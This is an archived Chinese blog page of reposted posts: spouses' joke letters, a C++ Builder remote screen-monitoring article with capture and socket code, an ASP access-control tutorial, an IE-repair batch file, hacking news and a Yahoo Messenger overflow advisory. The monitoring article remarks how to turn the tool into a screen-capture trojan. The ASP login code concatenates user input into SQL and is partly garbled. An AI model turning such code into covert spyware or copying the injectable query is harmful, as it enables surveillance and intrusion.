博主资料

留言短消息 加为好友 收藏

用户ID:  445972
昵称:  plaodj
来自:  湖南 长沙
年龄:  22
爱好: 焦点访谈

欢迎您的到来!

劲哥哥诚挚的欢迎您的到来!

日历

2007 - 8
   1234
567891011
12131415161718
19202122232425
262728293031 
«» 2007 - 8 «»

日志分类

个人统计

用户名: plaodj
等级: 四星会员
威望: 430
金钱: 12135
在线时间: 417 小时
日志总数: 2337
评论数量: 663
访问次数: 11083268
建立时间: 2005-09-10
RSS订阅       手机访问

日志文章列表

2007年08月30日 12:53:07

夫妻吵架后老公写给老婆的一封信

亲爱的老婆:
 

    你,在娘家还好吗?
    从我们怄气到现在你已经离家出走达38小时零37分钟了,这距离你出走史上的最高纪录还差4个小时零21分种,我知道你在等我向你登门道歉,我也准备这样做,但我更希望你能坚持下去,再创你出走史上的新高!

    我在家里一切还好,请不要惦念。虽然,你带走了存折,不过,你不用担心我的经济来源,因为我手里还有一张附属信用卡。信用卡用起来就是方便,我已经买了五件衬衣,七条内裤和十二双袜子,估计每天一套能穿到你回来了。名牌就是名牌,虽然贵了点……  


  我的伙食问题你也不用担心,我已经到七家新开张的酒楼试吃过了;带鱼,麻杆,猪头三他们怕我一个人孤单,天天陪着我,不过他们尽点好菜好酒,我没办法啦,你知道我死要面子的。最让我心烦的就是对门新搬来的那个女人,差不多每天都来借醋借蒜什么的。不过你放心我是决不会犯错误的,这方面你要对我有信心。


    至于,家里的花花草草,我想让它们提早适应沙漠化的环境,决不给它们浇水,这有利于它们的物种进化。对了,咱家的MiMi是陪你一起回娘家了吗?我两天没见它 了。  
    你也不用担心我那两个可爱的小舅子会一时冲动来找我做出什么不理智的事来,昨天我请他们爆搓了一顿,顺便向他们讲了我们之间的一点小事,他们听后拉着我的手哭着说:"姐夫,真是苦了你了!”
   

    我会接你并向你道歉的,不过你在娘家安心地住一段时间也好,"常回家看看"嘛,老人们也需要你。 
   另:如果你明天不回来的话,冰冰约我去吃比萨我就去了,反正闲着也是闲着,老拒绝人家也不好,终究是一个单位的同事嘛。  

                                                            再见! 你亲爱的老公










亲爱的老公:
 
    谢谢你的来信!

    我在娘家一切都好,不用挂念。忘了告诉你了,存折上的存款已经转存到了我的账户,本来我还稍许担心你的经济情况,不过既然你能恶性透支信用卡过得那么滋润,也用不着我担心了。  
   

    另外我做个善意的提醒,家里厨房碗柜最下面还有2包方便面,虽然你现在吃得挺好,不过我还是有些担心,也许当信用卡告罄后而带鱼,麻杆,猪头三他们个个忙的没空见面的时候,你会需要它们。  

    替我向对门的新邻居问声好,月底房屋贷款就会到期,到时你就不得不和你的新朋友说拜拜了!对了家里的花你千万别浇水,我种的是仙人掌。MiMi和我在一起,家里的灭害灵早用光了,现在你一定在和小强面面相觑吧。我那两个可爱的弟弟当然不会找你什么麻烦,他们一直在劝我离婚,找一个有本事的男人。 

 
    现在才觉得回家的感觉真好,不必每天那么辛苦的洗衣烧饭,可以自由的逛街shopping,真是开心!祝你明天和冰冰玩的愉快,另外听说冰冰的新男友是体育学院的拳击教练,也不知道是真是假,你知道我没那么八卦的啦!  
再见!  

                                                                    你亲爱的老婆

类别: 无分类 |  评论(0) |  浏览(3810) |  收藏
2007年08月30日 12:43:13

远程屏幕监视软件的开发[转]

操作系统:Windows XP SP1
开发所用计算机配置:512M内存+P42.4G CPU+800MHZ系统总线
环境:Borland C++ Builder 6.0+SUIStyle控件
至于功能需求分析,我们一点一点看,这或许是专业开发人员和普通自学程序员之间最大的差距,一起来学习、探讨一下吧!
1.为实现数据的网络传输,软件采用C/S(客户端/服务器)数据传输模式。从遵循计算机道德的角度出发,在该设计过程中,不打算编写具有木马特征的独立的服务端,而将软件集客户端(Client)和服务端(Server)于一体。软件基本定位是:远程辅助类工具软件。

Socket:咳……其实你可以花5分钟时间将客户端(Client)和服务端(Server)分离,并加入自启动的功能,如果够狠的话,再加入关联文件的功能,这不是一个截屏木马?

2.服务端(Server)实现:采用C++ Builder的Socket Server控件来实现服务端的数据传输功能。主要功能:监听本地计算机的指定端口,截获本机屏幕信息,拷贝屏幕区域到自定义的位图变量。

Socket:为了达到提高传输效率,服务端根据在连接过程中所获得的转换参数将位图转换成JPGE格式后存入缓存区,在与远程客户端连接的前提下,将缓存区数据流发送至客户端(Client)。
3.客户端(Client)实现:利用Winsock API函数来定义用于本软件网络数据传输的Sockets。功能实现:向远程主机服务端(Server)提出连接申请,并在此过程中将JPGE转换参数发送给服务端(Server)。在获得连接的前提下,不断接受远程服务端(Server)所发送至的包含远程主机屏幕信息的JPGE的数据流,并实时将所接受的图像在本软件的客户区域(Client Region)上重绘,从而实现在本地计算机实时监视远程计算机屏幕的目的。

详细功能设计
上面大体分析了功能和需要,下一步一起来看看如何进行详细的功能设计。
1.客户端(Client)
(1)客户端与服务端之间网络畅通状况的检测。编写Ping模块,此模块发送一个ICMP echo request(ICMP协议回显请求)至目标主机,如果获得回显,则向目标主机发送连接请求。
(2)客户端(Client)与服务端(Server)之间的数据传输。利用Winsock API函数来定义用于本软件数据传输的Sockets。具体过程为:连接远程主机->返回有效SOCKET(使用Connect_Server())->向SOCKET写字符串(使用Write_Socket())->向远程主机的指定端口发送字符串提供转换参数(使用SendMsg())->动态分配端口,并与SOCKET绑定->返回该SOCKET(使用BindSocket())->向远程主机的指定端口发送请求(使用SendStream())->从远程主机的指定端口接收数据流(使用RecvStream())。
(3)图像重绘:使用Image控件将从远程主机发送到的JPGE图像显示。

2.服务端(Server)
(1)服务端(Server)功能的实现。使用C++ Builder的Socket Server控件编写软件的服务端(Server)。监听本地计算机指定端口,接受由客户端发送至的相关参数,将参数传递给屏幕图像截取模块。
(2)屏幕图像截取与传输步骤:读取取得桌面的矩形区域范围GetWindowRect()->创建内存设备描述表从而定义位图变量GetDC()->拷贝屏幕的指定区域到位图BitBlt();->创建JPEG图象将位图转化为JPEG格式->保存JPEG图象信息至内存数据流Assign(),SavetoStream()->将图象信息数据流通过Sockets发送至客户端(由SendStream()实现)。

程序流程图


数据结构与算法
在此对实现主要功能的类和方法做出说明,对由IDE所生成的与可视化控件相关的方法在此不予详细说明。同时为配合新手学习,代码后附详细功能注释。
1.所用的VCL中现成的类
TBitmap(位图对象)类和TJPEGImage类。TBitmap(位图)是VCL中抽象图形类Graphics的一个对象,它可以用于在内存中创建和处理图像,也可以存储图像数据流。TBitmap包装了VCL中的位图操作,其属性有Palette、Height、Width和TransparentColor等;TJPEGImage封装了用于处理JPGE格式数据的Graphic类,它可以对以JPGE格式压缩的图像数据进行创建和读取。其属性有:Height、Palette、Performance、PixelFormat、Scale、Width等。

2.继承于VCL中的类
(1)线程类TRecvStreamThread,继承于TThread类:
class TRecvStreamThread : public TThrea
{
private:
protected:
void __fastcall Execute(); //
public:
__fastcall TRecvStreamThread(bool CreateSuspended);//接受数据的线程
bool __fastcall LoadImage(TImage *Image1);//显示图像
TImage *RemoteScreen; // 显示图象的对象指针
TStatusBar *StatusBar; // 显示状态信息的对象指针
AnsiString RemoteAddress; // 远程主机IP
int CL, CQ; // 色深和图象品质
};
(2)主窗口类TMainForm,继承于TForm类:
class TMainForm : public TForm
{
__published:
TMainMenu *MainMenu1;
TToolButton *ToolButton14;
……
……//可视化控件相关声明
void __fastcall HelpAbout1Execute(TObject *Sender);
void __fastcall FileExit1Execute(TObject *Sender);
void __fastcall ServerSocket1ClientRead(TObject *Sender,
TCustomWinSocket *Socket);
void __fastcall ServerSocket1ClientError(TObject *Sender,
TCustomWinSocket *Socket, TErrorEvent ErrorEvent,
int &ErrorCode);
void __fastcall FormCreate(TObject *Sender);
void __fastcall FileSaveAsItemClick(TObject *Sender);
void __fastcall HideForm(TObject *Sender);
……//处理可视化控件的相关方法
private:
void __fastcall CreateMDIChild(const AnsiString sAddress, int CL, int CQ);
public:
virtual __fastcall TMainForm(TComponent *Owner);
};
(3)子窗口类TMDIChild:
class TMDIChild : public TForm
{
__published:
……//可视化控件相关声明
void __fastcall FormClose(TObject *Sender, TCloseAction &Action);
void __fastcall Image1DblClick(TObject *Sender);
void __fastcall N3Click(TObject *Sender);
void __fastcall N2Click(TObject *Sender);
……//处理可视化控件的相关方法
private:
public:
virtual __fastcall TMDIChild(TComponent *Owner);
bool __fastcall LoadImage(void); // 载入图象
AnsiString RemoteAddress; // 远程主机IP
int CL, CQ; // 色深和图象品质
};

3.继承类中的相关方法:
(1)CaptureImage()——捕获当前屏幕并保存到Imagestream中。具体代码如下:
void CaptureImage(int options, int level, int cq, TMemoryStream* imgstream)
{
LONG width,height;
RECT capRect;
HDC DesktopDC;
switch (options) {
case CM_ENTIRESCREEN: // 捕获整个屏幕
// 取得桌面的矩形区域范围
GetWindowRect(GetDesktopWindow(),&capRect);
break;
case CM_ACTIVEWINDOW: // 捕获当前窗口
HWND ForegWin;
ForegWin = GetForegroundWindow(); // 取得当前窗口句柄
if (!ForegWin)
ForegWin = GetDesktopWindow();
GetWindowRect(ForegWin,&capRect); // 取得当前窗口的矩形区域范围
break;
}
DesktopDC = GetDC(GetDesktopWindow()); // 创建内存设备描述表
width = capRect.right - capRect.left;
height = capRect.bottom - capRect.top;
Graphics::TBitmap *bBitmap; // 定义位图变量
try {
bBitmap = new Graphics::TBitmap(); // 创建位图
bBitmap->Width=width;
bBitmap->Height=height;
if ((level>0)&&(level<8))
bBitmap->PixelFormat = TPixelFormat(level); // 设定色深
// 拷贝屏幕的指定区域到位图
BitBlt(bBitmap->Canvas->Handle,0,0,width,height,DesktopDC,
capRect.left,capRect.top,SRCCOPY);
if (cq>=0) {
TJPEGImage *jpeg;
try {
jpeg = new TJPEGImage; // 创建JPEG图象
jpeg->CompressionQuality = cq; // 设定图象品质
jpeg->Assign(bBitmap); // 将位图转化为JPEG格式
jpeg->SaveToStream(imgstream); // 保存JPEG图象信息
}
__finally {
delete jpeg; // 释放资源
}
}
else {
bBitmap->SaveToStream(imgstream); // 保存位图信息
}
}
__finally {
delete bBitmap; // 释放资源
}
}
(2)ServerSocket1ClientRead()——捕获并发送自己的屏幕图象。具体代码如下:
Void __fastcall TMainForm::ServerSocket1ClientRead(TObject *Sender,TCustomWinSocket *Socket)
{
AnsiString sRecvString = Socket->ReceiveText(); // 保存接收到的字符串
AnsiString sRemoteAddress = Socket->RemoteAddress; // 保存对方IP
int CL,CQ;
u_short port;
// 将接收到的字符串分解为接收端口、色深、品质3个参数
int pos = sRecvString.Pos("\n");
// 接收端口
port = u_short(StrToIntDef(sRecvString.SubString(1,pos-1),0));
sRecvString = sRecvString.SubString(pos+1,sRecvString.Length()-pos);
pos = sRecvString.Pos("\n");
// 色深
CL = StrToIntDef(sRecvString.SubString(1,pos-1),0);
sRecvString = sRecvString.SubString(pos+1,sRecvString.Length()-pos);
pos = sRecvString.Pos("\n");
// 品质
CQ = StrToIntDef(sRecvString.SubString(1,pos-1),0);
if (port) {
TMemoryStream *ImageStream; // 定义数据流
try {
ImageStream = new TMemoryStream; // 分配内存
// 捕获当前屏幕并保存到ImageStream中
CaptureImage(CM_ENTIRESCREEN, CL, CQ, ImageStream);
// 发送ImageStream到接收端口
if (!SendStream(sRemoteAddress, port, ImageStream))
MessageBox(0,"发送数据流失败","EagleEye",MB_ICONERROR);
}
__finally {
delete ImageStream; // 释放资源
}
}
}
(3)LoadImage ()——接受服务端屏幕数据并在本地计算机上重绘图像。具体代码如下:
bool __fastcall TRecvStreamThread::LoadImage(TImage *Image1)
{
CPingReply reply;
CPing PingHost;
bool bRtn = false; // 函数返回值初始为FALSE
StatusBar->SimpleText = "正在连接主机...";
// 先PING主机,检测网络是否畅通
bool rtn = PingHost.Ping(RemoteAddress.c_str(),reply,64,4000,32);
if (rtn) {
u_short RecvPort=0;
TMemoryStream *Stream;
try{
for(int i=1;i<=(ConfigForm->times);i++) //进入循环,不断获得远程桌面图像
{ // 定义一个数据流并分配内存
Stream = new TMemoryStream;
TJPEGImage *jpeg; // 定义JPEG图象
try{
jpeg = new TJPEGImage; // 分配内存
int RecvSocket = BindSocket(&RecvPort); //动态分配接收端口
if (RecvSocket)
{ // 将接收端口和色深、图象品质合成一条命令,参数之间以'\n'分隔
AnsiString Msg = IntToStr(RecvPort) + "\n" +IntToStr(CL) + "\n" +IntToStr(CQ) + "\n";
Application->ProcessMessages(); // 处理系统消息
// 向远程主机发送命令
if (SendMsg(RemoteAddress,LISTENPORT,Msg))
{ // 开始接收图象到数据流中
if (RecvStream(RecvSocket,Stream))
{
StatusBar->SimpleText = "正在接收数据...";
// 从数据流中载入图象
jpeg->LoadFromStream(Stream); // 显示图象
Image1->Picture->Bitmap->Assign(jpeg); //MessageBeep(MB_OK);
// 发出提示声音,返回值为TRUE,表示成功
bRtn = true; }
else
MessageBox(0,"接收数据流失败","EagleEye",MB_ICONERROR); }
else
MessageBox(0,("无法与主机'"+ RemoteAddress +"'建立连接").c_str(),"EagleEye",MB_ICONERROR); }
else
MessageBox(0,"分配端口失败,无法继续接收数据","EagleEye",MB_ICONERROR);}
__finally {
delete jpeg; // 释放资源
}
RecvPort+=1;
}
}
__finally {
delete Stream; // 释放资源
}
}
else
MessageBox(0,("主机'"+RemoteAddress+"'没有响应").c_str(),"EagleEye",MB_ICONERROR);
return bRtn;
}

大体流程就是这样,中间因为篇幅的问题省略掉了Ping模块的编写,不过已经提供了全部的程序代码,大家可以自己看看。

类别: 无分类 |  评论(0) |  浏览(7373) |  收藏
2007年08月30日 12:39:56

ASP中页面限权访问的几种方法

在设计网页时,经常遇到某些页面需限权访问的情况。比如,一个公司的某些产品只让某一或某些供应商或客户浏览。那么,我们如何实现这一功能呢?本文,笔者将向读者介绍几种限制客户访问权限的方法。

  通常,我们在设计过程中会面临三种情况:某一页面只让某一用户浏览、某一页面只让某些用户浏览和某些页面只让某些用户浏览。第一种情况很简单,笔者不再叙述,下文将详细介绍后两种情况的设计方法。

一、某一页面只让某些用户浏览
  将这些客户的信息保存在数据库中,若能在数据库中检索到客户输入的姓名和密码就允许访问该页面。
  Protect.asp文件 ′需限权访问的页面

  〈html〉〈head〉〈title〉赛迪主页〈/title〉〈/head〉〈body bgcolor="#00FFFF"〉

  ′此处可输入该页面的其它内容

  〈form action="Protect.asp" method="post"〉

  请输入姓名:

  〈input type="text" name="text"〉

  请输入密码:〈input type="password" size="20" name="password"〉

  〈input type="submit" name="B1" value="查询"〉〈/p〉〈/form〉

  〈%set conn=server.createobject("adodb.connection")

  conn.open "asptest"

  ′asptest是存放客户信息的表单permission所在的数据库的名字

  sql1="select  from permission where xm='"&&request.form("text") && "' and mima='"&&request.form("password")&&"'"

  set rs=conn.execute(sql1)%〉

  ′如果数据库中存在客户输入的姓名和密码,就显示页面product.asp的超级链接

  〈% if not rs.eof then%〉〈a href="product.asp"〉本公司的产品〈/a〉

  〈%end if%〉〈/body〉〈/html〉

二、某些页面只让某些用户浏览
  我们可以设计一登录页面register.asp,如果客户没有登录,在进入每个需限权访问的页面时强制客户先访问页面register.asp实现登录。成功登录之后自动返回到刚才要访问的页面。我们可用cookies和session两种方法来实现。

  1.用cookies实现

  如果客户已经登录过,就把登录的信息记录在客户端的cookies中,之后客户就可直接浏览其它限权访问的页面。

  register.asp

  〈% if request.form("b1")="提交" then

  set conn=server.createobject("adodb.connection")

  conn.open "asptest"

  sql1="select * from permi

类别: 无分类 |  评论(0) |  浏览(3118) |  收藏
2007年08月30日 12:38:42

IE修复简单批处理

@echo off
color AD
echo                 
echo               
echo               
echo               
echo 开始修复...
PAUSE
rundll32.exe advpack.dll /DelNodeRunDLL32 %systemroot%\System32\dacui.dll
rundll32.exe advpack.dll /DelNodeRunDLL32 %systemroot%\Catroot\icatalog.mdb
regsvr32 setupwbv.dll
regsvr32 wininet.dll
regsvr32 comcat.dll
regsvr32 shdoc401.dll
regsvr32 shdoc401.dll /i
regsvr32 asctrls.ocx
regsvr32 oleaut32.dll
regsvr32 shdocvw.dll /I
regsvr32 shdocvw.dll
regsvr32 browseui.dll
regsvr32 browseui.dll /I
regsvr32 msrating.dll
regsvr32 mlang.dll
regsvr32 hlink.dll
regsvr32 mshtml.dll
regsvr32 mshtmled.dll
regsvr32 urlmon.dll
regsvr32 plugin.ocx
regsvr32 sendmail.dll
regsvr32 comctl32.dll /i
regsvr32 inetcpl.cpl /i
regsvr32 mshtml.dll /i
regsvr32 scrobj.dll
regsvr32 mmefxe.ocx
regsvr32 proctexe.ocx mshta.exe /register
regsvr32 corpol.dll
regsvr32 jscript.dll
regsvr32 msxml.dll
regsvr32 imgutil.dll
regsvr32 thumbvw.dll
regsvr32 cryptext.dll
regsvr32 rsabase.dll
regsvr32 triedit.dll
regsvr32 dhtmled.ocx
regsvr32 inseng.dll
regsvr32 iesetup.dll /i
regsvr32 hmmapi.dll
regsvr32 cryptdlg.dll
regsvr32 actxprxy.dll
regsvr32 dispex.dll
regsvr32 occache.dll
regsvr32 occache.dll /i
regsvr32 iepeers.dll
regsvr32 wininet.dll /i
regsvr32 urlmon.dll /i
regsvr32 digest.dll /i
regsvr32 cdfview.dll
regsvr32 webcheck.dll
regsvr32 mobsync.dll
regsvr32 pngfilt.dll
regsvr32 licmgr10.dll
regsvr32 icmfilter.dll
regsvr32 hhctrl.ocx
regsvr32 inetcfg.dll
regsvr32 trialoc.dll
regsvr32 tdc.ocx
regsvr32 MSR2C.DLL
regsvr32 msident.dll
regsvr32 msieftp.dll
regsvr32 xmsconf.ocx
regsvr32 ils.dll
regsvr32 msoeacct.dll
regsvr32 wab32.dll
regsvr32 wabimp.dll
regsvr32 wabfind.dll
regsvr32 oemiglib.dll
regsvr32 directdb.dll
regsvr32 inetcomm.dll
regsvr32 msoe.dll
regsvr32 oeimport.dll
regsvr32 msdxm.ocx
regsvr32 dxmasf.dll
regsvr32 laprxy.dll
regsvr32 l3codecx.ax
regsvr32 acelpdec.ax
regsvr32 mpg4ds32.ax
regsvr32 voxmsdec.ax
regsvr32 danim.dll
regsvr32 Daxctle.ocx
regsvr32 lmrt.dll
regsvr32 datime.dll
regsvr32 dxtrans.dll
regsvr32 dxtmsft.dll
regsvr32 vgx.dll
regsvr32 WEBPOST.DLL
regsvr32 WPWIZDLL.DLL
regsvr32 POSTWPP.DLL
regsvr32 CRSWPP.DLL
regsvr32 FTPWPP.DLL
regsvr32 FPWPP.DLL
regsvr32 FLUPL.OCX
regsvr32 wshom.ocx
regsvr32 wshext.dll
regsvr32 vbscript.dll
regsvr32 scrrun.dll mstinit.exe /setup
regsvr32 msnsspc.dll /SspcCreateSspiReg
regsvr32 msapsspc.dll /SspcCreateSspiReg
echo IE修复完毕!
PAUSE


关于REGSVR32的用法,这个P处理的原理很简单,就是利用Regsvr32.exe 重新加载该组件并调用它的 DLLSelfRegister 函数!

类别: 无分类 |  评论(0) |  浏览(3312) |  收藏
2007年08月30日 12:36:15

俄罗斯黑客推荐Opera最安全

驱动之家
MPack是在黑客当中大名鼎鼎的一款PHP攻击脚本包,包含多个针对最新系统漏洞的攻击代码.上月数千家意大利旅游网站在一个周末被同时攻破,据称就与MPack有着密切的联系.近日,安全网站SecurityFocus找到了这一攻击代码的编写者之一,对其进行了网络采访.
这帮黑客给自己命名为“Dream Coders Team”,主要开发人员是三个俄罗斯人.他们从2006年6月就组成了这一小组织,进行攻击代码的开发.在采访中.该黑客表示,他们所攻击的系统漏洞一部分来自于研究他人的代码和公开文档.另一部分则需要购买.“一个IE 0day漏洞的平均价格大约是一万美元左右.”
当回答道利润的问题时,他表示:“和其他互联网活动来说,这一开发计划并没有那么有利可图.这只是一门生意而已,我们能从中得到收入,才能继续工作.只要我们还有兴趣,它就会继续存在.”
该黑客声称,他在俄罗斯有一份合法的工作.他并不认为自己的工作是一种犯罪,虽然有一些担心被抓,但他认为自己只是生产线上的一环.他的客户不会告诉他们拿这些代码做了什么,据称被MPack攻破的系统已经过万.最后,他补充了一句这样的话:“我建议大家使用Opera浏览器,并禁用脚本和插件.这样你就不会有一天被MPack这样的攻击软件逮到了.”

类别: 无分类 |  评论(0) |  浏览(3524) |  收藏
2007年08月30日 12:35:49

烟台政府网遭黑客攻击 网站内容改成骂人脏话

青岛早报
早报烟台讯 烟台莱阳一20岁的青年自以为是电脑高手,非法进入烟台某政府网站后,不仅恶意修改网站内容,还辱骂他人,近日被公安机关查获并拘留。
20日,莱阳市公安局计算机管理科接到烟台市公安局网监处的指令:8月初,烟台市某政府网站技术员发现,网站服务器被黑客入侵,导致网站被迫切断网络,停止服务。经初查,莱阳一ADSL用户有重大嫌疑。经初查,莱阳一城区计算机用户有重大嫌疑,要求立案查处。
莱阳市公安局计算机科根据有关线索成立了专案小组,对涉嫌ADSL用户情况展开调查。调查发现,ADSL用户为朱某,账号自2006年5月7日开通后,一直正常使用,但是经过调查朱某被排除了作案嫌疑。
经过深入调查,朱某20岁的儿子朱某某进入警方视线,朱某某高中毕业后至今无业。
朱某某交代,7月31日24时至8月1日凌晨3时,他使用ADSL登录互联网后,侵入烟台某政府网站,当时觉得非常好玩,便对网站内容进行了修改、删除,感到不过瘾他又在网站上留言谩骂侮辱他人,导致网站停止网络服务。目前,违法嫌疑人朱某某已被莱阳市公安局依法处以行政拘留10日的处罚。

类别: 无分类 |  评论(0) |  浏览(3532) |  收藏
2007年08月30日 12:35:14

病毒划得巨财去 国际黑客准备打一场世界大战

金融时报
  据英国媒体报道,国际黑客打算整合世界各地的力量在2007年庞大的互联网上打一场“世界大战”。国际黑客们此次大战的攻击目标主要有ICQ、MSN等即时工具,接入互联网的手机、社会公益网站、新版IE浏览器以及新推出的VISTA操作系统。
  2007年始,一家国际黑客组织利用叫作“pharming”的新型病毒攻击了世界65家金融企业和网上交易企业,窃取个人账户信息。这轮攻击于2月19日在澳大利亚首次启动,此后迅速在多国扩散,平均每天就将1000名以上电脑用户引入伪装网站,乘机窃取网络银行用户名和密码等信息。英国巴克莱银行、苏格兰银行、美国捷运信用卡都在攻击中相继受损。韩国花旗银行网上信用卡结算代办系统也遭到黑客攻击,造成20名顾客账户的5000余万韩元被划转。
  安全专家表示,从技术较量的角度说,要在网上追查这种干小偷勾当的黑客并不难,问题是,国际上绝大多数银行都不愿意让警方介入这类案件,银行方面担心这样的案件一旦被媒体公开,反而会让大家对银行的网上安全失去信任,影响银行的声誉和生意。但是,若无警方介入,就不能使用专门手段来把这些网上小偷收入法网,依法惩罚。
  如今的网络就像处在一片混沌的原始状态,没有一个公共保护者维护秩序,防毒软件都是看家护院,自我保护。互联网上的无政府状态正是国际黑客大盗猖獗的主要原因,网络秩序的建立将是一个漫长的过程,与黑客大盗们的斗争也将历经漫长过程。

类别: 无分类 |  评论(0) |  浏览(3091) |  收藏
2007年08月30日 12:34:40

黑客攻击全球最大招聘网站

东方早报
全球最大的招聘网站Monster.com近日遭到了一种新型特洛伊木马病毒的攻击。黑客成功窃取了数十万用户包括家庭住址和电话号码在内的个人信息,并向受害者发出勒索邮件。
这种新木马病毒由于企图获取在线招聘网站Monster.com上求职人员的个人信息,因此被名为infos-tealer.monstres。并非此前任何版本的木马,而是最新变种,还发现它可攻击其他在线求职网站。网络安全公司赛门铁克(SYMANTEC)表示,新的木马程序是通过交付讯息使得黑客已经搜集多达160万件个人信息,将影响几十万的用户。
这些信息包括姓名、住址、电邮地址和电话号码等。黑客再用“网络钓鱼(Phishing)”(通过电子邮件或即时通讯讯息,把用户诱骗至官方外观几无二致的假冒网站,冒充真正需要信息的值得信任的人,欺诈性地获取敏感的个人信息),以Mon-ster.com的名义诱骗用户下载一个名为“MonsterJobSeeker”的工具。而这实际上是一个木马病毒,可以将被感染电脑的文件加密,受害者也就无法打开这些文件。黑客再向这些受害者发出电邮,勒索钱财,否则就威胁删除受感染电脑里的全部文件。
安全公司称上个周末已有4.6万名用户遭到感染,它同时提醒上网求职者应注意保护自己的个人信息,将个人常用电邮账户与求职账户分开。
Monster.com拥有超过7300万份个人求职简历。

类别: 无分类 |  评论(0) |  浏览(3036) |  收藏
2007年08月30日 12:34:10

黑客攻击荷兰银行 利用电脑病毒盗部分客户账号

新华网
新华网布鲁塞尔8月18日电(记者刘秀荣)据比利时媒体日前报道,荷兰银行的发言人说,前段时间有部分客户账号中的资金被网络犯罪分子利用电脑病毒盗走,这些客户的损失将得到银行的补偿,但是银行方面并没有透露被盗账户和资金的具体情况。
反病毒公司卡巴斯基的专家认为,黑客可能使用电脑病毒通过“视窗”操作系统的缺陷进入上网者的电脑系统,然后窥伺他们的网上行为,了解到其所在的银行。接着,黑客欺骗上网者和银行系统进行错误操作,将上网者银行账户中的钱转给黑客。
卡巴斯基公司的罗埃尔·舒温伯格说,他们只发现黑客使用这种病毒攻击了荷兰银行。他警告说,其他任何一个网上银行都还有遭到攻击的可能,因此各银行应当采取必要的措施,避免类似情况再次发生。

类别: 无分类 |  评论(0) |  浏览(3108) |  收藏
2007年08月30日 12:33:41

Google Gadget存漏洞 可被利用发动钓鱼攻击

赛迪网
  据国外媒体报道,网络安全研究人员Robert Hansen本周五表示,Google Gadget可能被一些不法份子用来发动“钓鱼式”攻击。
  8月19日消息,据国外媒体报道,网络安全研究人员Robert Hansen本周五表示,Google Gadget可能被一些不法份子用来发动“钓鱼式”攻击。
  Google Gadget,是一款小程序,用来收集各种网络信息,可以为用户方便地显示从体育比赛得分到天文数据在内的各种信息。
  但不幸的是,Google Gadget也可能被黑客利用,并躲避反钓鱼过滤程序的追踪。据悉,黑客可以在gmodules.com建立钓鱼网站,然后向受害者发送该URL链接。
  因为Google的gmodules.com域名得到了反钓鱼过滤的认可。因此,受害者在进入钓鱼网站后,并不会收到浏览器过滤软件的警告信息。
  据悉,Robert Hansen已经将该问题上报给Google,但对Google的回复感到不满意。Hansen说,Google称该漏洞只是个别网站的小问题。
  Hansen还说:“如果Google对此置之不理,那么肯定会被黑客所利用。”


类别: 无分类 |  评论(0) |  浏览(3045) |  收藏
2007年08月30日 12:33:00

安全专家:下手要狠 软件漏洞就得公开曝光

IT.com.cn
  【IT世界讯】8月17日消息,安全专家Seth Fogie今日指出,将软件漏洞曝光,是促使软件漏洞尽早得到修复的最佳方式。因为,软件开发商认为无人知晓这些漏洞,短时间内不会对用户构成威胁,从而拖延甚至放弃修补这些安全漏洞。
  在他的博客中,Fogie称,今年三月,他在一款名为EZPhotoSales的在线照片管理程序中发现了一个安全漏洞。随即,他联系了这家公司并报告了许多他发现了程序BUG和漏洞。该公司承认,在EZPhotoSales中存在大量漏洞,他们正在开发一款新的产品来取代它。
  而一直等到八月,Fogie发现问题依然没有得到解决,而新产品也仍未发布。于是,恼怒之下,Fogie将该漏洞公布于众——他将该漏洞的相关信息发送给FD、Bugtraq和InformIT等安全公司。令人惊讶的是,不久之后,EZPhotoSales开发商迅速发布了一款升级补丁。
  Fogie表示,对于软件公司来说,迫使它们尽心尽力地维护软件,保护用户权益,最好的办法就是个曝光他的软件的漏洞。否则,这些公司将视若无睹,任凭用户安全受到无限挑战。


类别: 无分类 |  评论(0) |  浏览(2858) |  收藏
2007年08月30日 12:32:16

3黑客盗取22亿游戏币谋利14万元 获刑1至2年

南方日报
利用木马病毒等途径非法侵入游戏中心系统,在游戏过程中通过故意输分和直接转移的方式,将22亿个游戏金币转为己有,并低价出售获利14万元。3名作案的网络黑客因犯破坏计算机信息系统罪而锒铛入狱。 缘起 利用“木马”侵入游戏系统
26岁的代某酷爱电脑,并熟练掌握了互联网安全防卫技术。去年9月初,他偶然发现中国游戏中心系统内存在网络安全漏洞,便开始在广州市某出租屋内,利用木马病毒等途径非法侵入该中心系统,在短短几天内,便从该系统获取约700余个游戏客户的账户资料。
他还发现,该游戏系统中的“在线转账”功能可将上述账号内的游戏金币(即游戏积分)转移到其指定的其他账内。按照官方网络游戏金币的价格, 8000个游戏金币可兑换1元,代某从系统中获得的700余个账户内的金币共计20多亿个,如果这些游戏金币全部兑换成人民币,将是一笔很可观的利益。


类别: 无分类 |  评论(0) |  浏览(3088) |  收藏
2007年08月30日 12:31:30

俄黑客依据福布斯榜单网上盗取富豪150万美元

据俄新网报道,俄罗斯黑客团伙成功盗窃美国几名富豪银行帐户资料,获得赃款共计150万美元。8月17日,美国纽约地方检查机关宣布对这一黑客团队进行起诉。  据检查机关透露,这一俄罗斯黑客团伙头目名叫伊戈尔-克洛波夫,现年24岁,该团伙的窝点位于他在莫斯科的住宅内。
  克洛波夫按照福布斯400名最富有商人名单寻找盗取的对像,然后雇佣4名黑客高手与其同谋伪造虚假文件,闯入银行系统获得富豪们的银行帐户资料。
  克洛波夫在盗取德克萨斯州亿万富翁查尔斯-威利的银行帐户资料,并企图购买700万美元的黄金时被检查机关发现。
  检查机关对该团伙指控的罪名有:盗取他人150万美元,企图盗取1007万美元,洗黑钱等。如果法院判定这五人有罪的话,他们将面临25年监禁。


类别: 无分类 |  评论(0) |  浏览(3156) |  收藏
2007年08月30日 12:30:45

雅虎通ywcvwr.dll远程堆溢出漏洞

受影响系统:
Yahoo! Messenger 8.1.0.413
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 25330
雅虎通是一款非常流行的即时通讯工具。
雅虎通在处理畸形功能请求时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制用户系统。
雅虎通中有个名为webcam的功能。当webcam请求初始化的时候雅虎通会生成一个类(webcamclass),webcamclass会在这个地方(ywcvwr.dll)申请一段内存,这段内存的长度是0x400:
.text:10001737 cmp edi, [esp+0Ch+arg_0]
.text:1000173B jl short loc_10001735
.text:1000173D cmp edi, 1400000h
.text:10001743 jg short loc_10001752
.text:10001745 push edi
.text:10001746 call j_??2@YAPAXI@Z ; operator new(uint)
.text:1000174B mov ebx, eax
.text:1000174D test ebx, ebx
这段内存的用处是存放从jpc解压出来的bitmap的内容,但使用用户数据包内提供的数据来作为边界判断条件:
.text:10002C5C mov [eax+2], cl ; eax是前面这个长度为0x400的buffer
……………………….
